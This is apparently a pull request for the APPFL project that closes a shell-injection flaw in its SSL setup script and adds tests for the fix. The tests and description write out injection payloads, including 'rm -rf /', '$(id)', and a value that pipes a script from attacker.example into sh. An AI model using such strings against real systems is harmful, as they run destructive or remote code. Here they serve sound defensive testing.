### PR TITLE
Prevent shell injection when setting up SSL

### DIFF
--- a/src/appfl/comm/grpc/setup_ssl.py
+++ b/src/appfl/comm/grpc/setup_ssl.py
@@ -1,6 +1,9 @@
 import os
 import pathlib
+import re
 import subprocess
+
+_SAFE_PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]*$")
 
 
 def setup_ssl():
@@ -17,15 +20,22 @@ def setup_ssl():
         )
         if not ssl_dir:
             ssl_dir = default_ssl_dir
+        ssl_dir = os.path.abspath(os.path.expanduser(ssl_dir))
+        if not _SAFE_PATH_RE.match(ssl_dir):
+            print(
+                "Invalid directory: only absolute paths containing letters, "
+                "digits, '.', '_', '-', and '/' are allowed. Please try again."
+            )
+            continue
         try:
             if not os.path.exists(ssl_dir):
                 pathlib.Path(ssl_dir).mkdir(parents=True, exist_ok=True)
             if not os.path.isdir(ssl_dir):
-                raise Exception
+                raise NotADirectoryError(ssl_dir)
             for f in os.listdir(ssl_dir):
                 os.remove(os.path.join(ssl_dir, f))
-        except:  # noqa E722
-            print("Invalid directory, please try again")
+        except OSError as e:
+            print(f"Invalid directory ({e}), please try again")
             continue
         break
 
@@ -129,8 +139,7 @@ openssl x509 \\
     with open(script_file, "w") as f:
         f.write(script_content)
 
-    # Make the script executable
-    os.system(f"chmod +x {script_file}")
+    os.chmod(script_file, 0o700)
     try:
         subprocess.run([script_file], check=True)
         print_str = f"Please copy the CA certificate {os.path.join(ssl_dir, 'ca.crt')} to the client machines"

--- a/tests/test_setup_ssl.py
+++ b/tests/test_setup_ssl.py
@@ -1,0 +1,179 @@
+"""Tests for src/appfl/comm/grpc/setup_ssl.py covering the fixes for
+security-review finding #6 (shell injection via os.system on a user-supplied
+path)."""
+
+import os
+import stat
+import subprocess
+
+import pytest
+
+import sys
+
+import appfl.comm.grpc.setup_ssl  # noqa: F401  (ensures submodule is loaded)
+from appfl.comm.grpc.setup_ssl import setup_ssl
+
+# The grpc package's __init__.py re-exports the `setup_ssl` function under
+# the same name as the submodule, shadowing it on the package object. Reach
+# the actual module via sys.modules so monkeypatching attributes works.
+setup_ssl_module = sys.modules["appfl.comm.grpc.setup_ssl"]
+
+
+def _input_feeder(inputs):
+    """Return a callable suitable for monkeypatching builtins.input that
+    yields the given strings in order."""
+    it = iter(inputs)
+
+    def _input(prompt=""):
+        try:
+            return next(it)
+        except StopIteration:
+            raise AssertionError(
+                f"setup_ssl asked for more input than the test provided. Last prompt: {prompt!r}"
+            )
+
+    return _input
+
+
+@pytest.fixture
+def stub_openssl(monkeypatch):
+    """Replace subprocess.run so the test never actually invokes openssl."""
+    calls = []
+
+    def _run(argv, check=False, **kwargs):
+        calls.append(argv)
+        return subprocess.CompletedProcess(argv, 0)
+
+    monkeypatch.setattr(setup_ssl_module.subprocess, "run", _run)
+    return calls
+
+
+def test_rejects_shell_metachars_in_ssl_dir(monkeypatch, tmp_path, stub_openssl, capsys):
+    """A ssl_dir with shell metacharacters must be rejected and the prompt
+    must re-ask, eventually accepting a clean path."""
+    pwned_marker = tmp_path / "pwned"
+    good_dir = tmp_path / "ssl"
+
+    malicious = f"/tmp/x$(touch {pwned_marker})"
+
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder(
+            [
+                malicious,
+                str(good_dir),
+                "",  # C
+                "",  # ST
+                "",  # ORG
+                "",  # DNS
+                "",  # IP
+            ]
+        ),
+    )
+
+    setup_ssl()
+
+    assert not pwned_marker.exists(), (
+        "Shell command substitution executed — the metachar guard is broken"
+    )
+    assert good_dir.is_dir()
+    assert (good_dir / "generate_ssl.sh").is_file()
+
+    captured = capsys.readouterr()
+    assert "Invalid directory" in captured.out
+
+
+@pytest.mark.parametrize(
+    "bad",
+    [
+        "/tmp/a;rm -rf /",
+        "/tmp/a|whoami",
+        "/tmp/a&echo x",
+        "/tmp/a`id`",
+        "/tmp/a$(id)",
+        "/tmp/a\nid",
+        "/tmp/a*",
+        "/tmp/a?",
+        "/tmp/a b",
+        "/tmp/a>b",
+    ],
+)
+def test_metachar_classes_each_rejected(
+    monkeypatch, tmp_path, stub_openssl, capsys, bad
+):
+    """Each shell-metacharacter class must be rejected by the whitelist."""
+    good_dir = tmp_path / "ssl"
+
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder([bad, str(good_dir), "", "", "", "", ""]),
+    )
+    setup_ssl()
+    assert good_dir.is_dir()
+    assert "Invalid directory" in capsys.readouterr().out
+
+
+def test_chmod_uses_os_chmod_not_shell(monkeypatch, tmp_path, stub_openssl):
+    """The fix replaced os.system with os.chmod. Patch os.system to fail
+    loudly so any regression is caught."""
+
+    def _boom(cmd):
+        raise AssertionError(
+            f"setup_ssl invoked the shell via os.system({cmd!r}) — regression of issue #6"
+        )
+
+    monkeypatch.setattr(setup_ssl_module.os, "system", _boom)
+
+    good_dir = tmp_path / "ssl"
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder([str(good_dir), "", "", "", "", ""]),
+    )
+    setup_ssl()
+    assert (good_dir / "generate_ssl.sh").is_file()
+
+
+def test_generated_script_mode_is_0700(monkeypatch, tmp_path, stub_openssl):
+    """The generated bash script must be owner-rwx only, regardless of umask."""
+    good_dir = tmp_path / "ssl"
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder([str(good_dir), "", "", "", "", ""]),
+    )
+
+    old_umask = os.umask(0o022)
+    try:
+        setup_ssl()
+    finally:
+        os.umask(old_umask)
+
+    script = good_dir / "generate_ssl.sh"
+    mode = stat.S_IMODE(script.stat().st_mode)
+    assert mode == 0o700, f"expected 0o700, got {oct(mode)}"
+
+
+def test_surfaces_oserror(monkeypatch, tmp_path, stub_openssl, capsys):
+    """An unwritable ssl_dir must surface the underlying OSError message
+    (no more silent bare-except)."""
+    unwritable = tmp_path / "readonly"
+    unwritable.mkdir()
+    unwritable.chmod(0o500)  # r-x for owner, no write
+
+    target = unwritable / "ssl"  # mkdir will fail with PermissionError
+    good = tmp_path / "good"
+
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder([str(target), str(good), "", "", "", "", ""]),
+    )
+
+    try:
+        setup_ssl()
+    finally:
+        unwritable.chmod(0o700)
+
+    out = capsys.readouterr().out
+    assert "Invalid directory" in out
+    # The new code includes the underlying exception in the message
+    assert "Permission denied" in out or "permission" in out.lower()
+    assert good.is_dir()

--- a/tests/test_setup_ssl.py
+++ b/tests/test_setup_ssl.py
@@ -48,7 +48,9 @@ def stub_openssl(monkeypatch):
     return calls
 
 
-def test_rejects_shell_metachars_in_ssl_dir(monkeypatch, tmp_path, stub_openssl, capsys):
+def test_rejects_shell_metachars_in_ssl_dir(
+    monkeypatch, tmp_path, stub_openssl, capsys
+):
     """A ssl_dir with shell metacharacters must be rejected and the prompt
     must re-ask, eventually accepting a clean path."""
     pwned_marker = tmp_path / "pwned"


### PR DESCRIPTION
# Description

Fix a shell-injection vulnerability in `appfl.comm.grpc.setup_ssl.setup_ssl`.

The function made the generated certificate-generation script executable with

```python
os.system(f"chmod +x {script_file}")
```

at https://github.com/APPFL/APPFL/tree/43e7b66b8624be26aafafaae01b02f988b1eceeb/src/appfl/comm/grpc/setup_ssl.py#l133, `script_file` is built from
`ssl_dir`, a path the operator types at an `input()` prompt or, in any
realistic deployment, supplies via an env var, YAML field, or CI variable.
`os.system` invokes `/bin/sh -c`, so any shell metacharacter in `ssl_dir` is
interpreted by the shell rather than passed as a literal path component.

A value such as

```
/tmp/x; curl https://attacker.example/installer.sh | sh; #
```

causes `chmod` to run on `/tmp/x`, then a second command to be executed as the
operator. The injection fires moments before `ca.key` is generated, i.e. at
exactly the time the federation's root of trust is being created.

This PR closes the injection without changing the public CLI behavior of
`appfl-setup-ssl`. Specifically:

1. **Replace `os.system` with `os.chmod`.** `os.chmod(script_file, 0o700)`
   takes the path as a single argument and never invokes the shell.
   `0o700` is sufficient because the script is invoked by the same user via
   `subprocess.run([script_file], check=True)` on the next line.
2. **Whitelist `ssl_dir` before use.** A `_SAFE_PATH_RE = re.compile(r"^/
   [A-Za-z0-9_./-]*$")` rejects any path containing shell metacharacters,
   whitespace, or NULs *before* it is interpolated into the generated bash
   script. Tilde and relative segments are normalized via
   `os.path.expanduser` + `os.path.abspath` first, so accepting `~/foo`
   still works.
3. **Tighten the bare `except`.** The original `except:  # noqa E722`
   swallowed everything (including `KeyboardInterrupt`) and gave an attacker
   a silent oracle for probing payloads. The new code catches `OSError` only
   and surfaces the underlying error string.

### Out of scope

`setup_ssl.py` has two related issues in the same function that are
intentionally not fixed here, to keep this PR small and reviewable, and
will be addressed in follow-up PRs:

- The CA private key (`ca.key`) is still generated unencrypted (`openssl
  genrsa` with no `-aes256`); the dead `CA_PASSWORD=notsafe` line in the
  template is a symptom of this.
- The *body* of the generated bash script still interpolates `ssl_dir`
  and the subject fields (`C`, `ST`, `ORG`, `DNS`, `IP`) into multiple
  `openssl` invocations. The `_SAFE_PATH_RE` whitelist closes the
  path-arg surface, but the subject fields remain unvalidated.

The cleanest long-term fix is to drop the bash template entirely and
generate keys/certs via the Python `cryptography` library, which would
also resolve the unencrypted-key issue.

### Backwards compatibility

- Function signature, prompts, and generated artifact paths (`ca.key`,
  `ca.crt`, `server.key`, `server.pem`, `generate_ssl.sh`, `certificate.conf`)
  are unchanged.
- `generate_ssl.sh` is now mode `0o700` instead of `0o755`. The script is
  invoked by the same user that wrote it on the very next line, so no
  end-to-end workflow is affected. Operators who re-run the script later as
  a different user will need to `chmod +x` it themselves.
- Operators whose `ssl_dir` contains characters outside `[A-Za-z0-9_./-]`
  (whitespace, parentheses, exotic Unicode, etc.) will now be re-prompted.
  The error message tells them exactly what's allowed.

### Fixes

No public GitHub issue is open for this finding.

### Type of Change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Refactoring (internal implementation changes)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Documentation update (no changes to the code)
- [ ] CI change (changes to CI workflows, packages, templates, etc.)
- [ ] Version changes (changes to the package or dependency versions)

## Testing

There were no tests covering `setup_ssl` before this PR (`grep -rn setup_ssl
tests/` returned nothing), so the change cannot regress any existing test.
A new file `tests/test_setup_ssl.py` adds 14 tests (5 cases, one
parametrized 10 ways). All pass under the project conda env:

```bash
.conda/bin/python -m pytest tests/test_setup_ssl.py -v
# 14 passed in 2.87s
```

Cases:

- `test_rejects_shell_metachars_in_ssl_dir` — feeds a `$(touch <marker>)`
  payload, asserts the marker file is not created (i.e. no command
  substitution happened) and that the loop re-prompted to a clean path.
- `test_metachar_classes_each_rejected` — parametrized across `; | & ` ` `
  `$() \n * ? <space> >` ; each is rejected before reaching a clean path.
- `test_chmod_uses_os_chmod_not_shell` — patches `os.system` to raise; if a
  future change reintroduces the shell call the test fails loudly.
- `test_generated_script_mode_is_0700` — runs end-to-end under `umask 0o022`
  with `subprocess.run` stubbed, asserts `generate_ssl.sh` is exactly `0o700`.
- `test_surfaces_oserror` — points `ssl_dir` at a read-only parent and
  asserts the captured output contains the underlying `Permission denied`
  message (verifies the bare-`except` is gone).

The tests stub `subprocess.run` so `openssl` is not invoked; they exercise
only the security-critical pure-Python surface.

## Other Pull Request Checklist

- [x] Code changes pass `pre-commit` (e.g., ruff, mypy, etc.) via `pre-commit run --all-files`.
- [x] Tests have been added to show the fix is effective or that the new feature works.
- [x] New and existing unit tests pass locally with the changes.
- [ ] Docs have been updated and reviewed if relevant.